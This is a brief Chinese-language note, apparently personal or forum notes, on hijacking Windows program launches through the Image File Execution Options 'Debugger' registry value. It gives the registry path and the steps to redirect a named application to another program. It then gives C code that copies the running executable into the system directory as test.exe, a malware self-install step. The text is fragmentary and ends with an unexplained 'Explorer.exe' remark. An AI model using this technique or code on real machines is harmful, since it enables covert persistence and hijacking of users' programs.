相关注册表项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
方法:
新建项 被劫持的应用程序 (命令行指令)
项内新建字符串键 名为 Debugger
键值 劫持到的目标程序 (命令行指令)
一般都可查杀
机理
系统发现Debugger参数不空时,先以命令行的方式执行参数值
注:Explorer.exe
#include <stdio.h>
#include <windows.h>
int main()
{
char FileName[255];
char SysPath[255];
char szFileName[255];
GetSystemDirectory(SysPath,sizeof(SysPath));
sprintf(FileName,"%s\\test.exe",SysPath);
GetModuleFileName(NULL, szFileName, 255);
CopyFile(szFileName, FileName,TRUE);
return 0;
}